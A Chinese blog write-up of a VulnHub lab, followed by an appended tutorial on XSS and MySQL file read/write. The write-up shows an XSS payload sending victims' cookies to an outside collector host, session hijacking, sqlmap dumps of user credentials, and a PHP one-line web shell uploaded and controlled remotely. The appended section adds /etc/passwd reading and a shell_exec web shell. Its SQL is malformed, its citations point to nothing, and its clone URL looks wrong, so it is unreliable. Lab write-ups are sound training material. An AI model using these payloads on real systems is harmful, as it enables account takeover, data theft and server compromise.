渗透测试靶场xss_and_mysql_file靶场打靶详情

记录一次vulnhub靶场的打靶过程,该靶场主要涉及xss漏洞和sql注入漏洞。

靶场下载地址: https://download.vulnhub.com/pentesterlab/xss_and_mysql_file.iso

靶机IP:192.168.56.5

靶场环境安装

VirtualBox新建靶场

选中新建的虚拟机右键,选择设置

选择存储模块,选择控制器IDE,选中没有盘片,属性,分配光驱,第二IDE控制器主通道,点击后面的关盘按钮,选中Choose a Disk File,选择下载好的xss_and_mysql_file.iso文件。

选择网络配置,网卡一选择  仅主机(Host-Only)网络

创建完成以后开启新建的虚拟机,系统会自动安装,打开后发现系统自动登录后台没有密码。

使用nmap对靶机Ip地址进行扫描

发现开放了22和80端口,

使用dirb对网站进行目录扫描,发现classes、css、all目录。

        登录网站http://192.168.56.5,发现这是一个blog网站,有登录窗口,评论文章等功能,首先应该想到测试系统是否存在xss漏洞。

        在网站的登录窗口测试弱口令没有成功。并且没有报错提示也没有注册账号的地方,所以先放下这个登录页面。

测试xss漏洞

        在浏览博客的评论功能区,提交带有测试xss漏洞的js脚本文件。点击提交以后有js弹窗执行,说明此处确实存在xss漏洞。

评论区输入的xss测试脚本得到执行,弹窗输出123

利用xss漏洞尝试抓取网站的cookie

使用pikachu靶场自带的cookie抓取工具,首先登录xss管理后台

在博客的评论区写入抓取网站cookie的js代码;

<script>document.location='http://192.168.56.1/test/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>

点击提交按钮后xss后台得到cookie

PHPSESSID=82f04js8fagh2odfnmd2e0pev6

将得到的cookie信息填写到cookieEditor工具中,然后再次进入bolg的登录网站发现已经是登录状态。(cookieEditor的使用方法可自行百度)

测试SQL注入漏洞

登录后台后点击edit编辑文章,发现参数id可能存在sql注入漏洞。输入'单引号程序报错,

输入4 and 1=1拼接的URL:

http://192.168.56.5/admin/edit.php?id=4%20and%201=1  可以执行说明此处确实存在sql注入漏洞。

使用sqlmap进行漏洞利用

sqlmap -u "http://192.168.56.5/admin/edit.php?id=1" --cookie="PHPSESSID=82f04js8fagh2odfnmd2e0pev6" --dbs --batch

得到数据库信息

抓取数据库中的信息:

sqlmap -u "http://192.168.56.5/admin/edit.php?id=4" --cookie=PHPSESSID=82f04js8fagh2odfnmd2e0pev6 -D blog -T users -C login,password --dump --batch

得到数据库blog中的user表格中的数据

利用sqlmap上传木马文件

准备一句话木马文件:

上传一句话木马文件:

sqlmap -u "http://192.168.56.5/admin/edit.php?id=1" --cookie="PHPSESSID=82f04js8fagh2odfnmd2e0pev6" --file-write ./shell.php --file-dest '/var/www/css/shell.php'

确认文件已经长传到css目录中

访问文件

使用蚁剑连接靶机

连接成功后打开虚拟终端

至此靶机渗透测试结束。

总结:

1.使用nmap对网站进行端口扫描发现开放22和80端口。

2.登录网站发现评论文章的功能存在xss漏洞。

3.利用xss漏洞获取浏览器的cookie信息PHPSESSID。

4.利用cookie信息登录到网站后台发现编辑文章的功能存在sql注入漏洞,使用sqlmap利用漏洞得到数据库user表格的信息。

5.利用sqlmap的文件上传功能构造一句话木马文件上传到css目录。

6.使用蚁剑连接靶机上的一句话木马。

### 关于XSSMySQL文件靶场的手工渗透测试学习教程 #### XSS攻击的学习资源 跨站脚本攻击(Cross-Site Scripting,简称XSS)是一种常见的Web安全漏洞。它允许攻击者通过注入恶意脚本到受信任的网站上,从而窃取用户的敏感数据或执行其他恶意操作。 对于初学者来说,可以从以下几个方面入手: - **理解XSS的工作原理**:XSS分为存储型、反射型和DOM型三种类型[^1]。每种类型的攻击方式不同,因此需要分别掌握其特点。 - **实践环境搭建**:可以使用OWASP Juice Shop这样的综合型Web应用安全性练习平台来模拟真实的XSS攻击场景[^2]。此外,也可以尝试Pikachu等专门针对单一漏洞设计的小型靶场工具[^3]。 ```bash git clone https://github.com/bugcrowd/pikachu.git cd pikachu php -S localhost:8000 ``` 上述命令用于克隆并运行Pikachu项目,在本地启动服务后即可访问相应的XSS实验页面进行手工渗透测试演练。 #### MySQL文件读写利用技巧 当涉及到数据库层面的安全隐患时,SQL Injection往往是主要切入点之一。如果成功实施了SQL注入,则有可能进一步扩展权限至操作系统级别甚至物理磁盘上的任意文件存取控制权。 具体而言,MySql提供了LOAD_FILE()函数以及INTO OUTFILE语句作为潜在威胁手段: - `SELECT LOAD_FILE('/etc/passwd');` 可以尝试加载服务器端指定路径下的文本内容返回给客户端显示出来; - 而像下面这样构造查询字符串就可以把当前表中的某些字段导出保存成外部新创建出来的文档形式存在硬盘里头去了:`INSERT INTO test_table VALUES ('test', 'data') UNION ALL SELECT NULL,'<?php echo shell_exec($_GET['cmd']);?>' INTO OUTFILE '/var/www/html/shell.php';`. 当然实际操作过程中还需要考虑诸多因素比如目标主机的操作系统的差异性所带来的兼容性问题等等. #### 综合实战指南 为了更好地巩固理论知识并将所学应用于真实世界当中去解决复杂难题的能力培养起来的话,这里给出几条建议供大家参考借鉴: - 多参与CTF竞赛活动积累经验; - 阅读官方文档深入探究各个技术细节之处; - 加入社区讨论群组互相交流心得感悟共同进步成长. 最后提醒大家注意合法合规前提下开展一切研究探索工作!
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值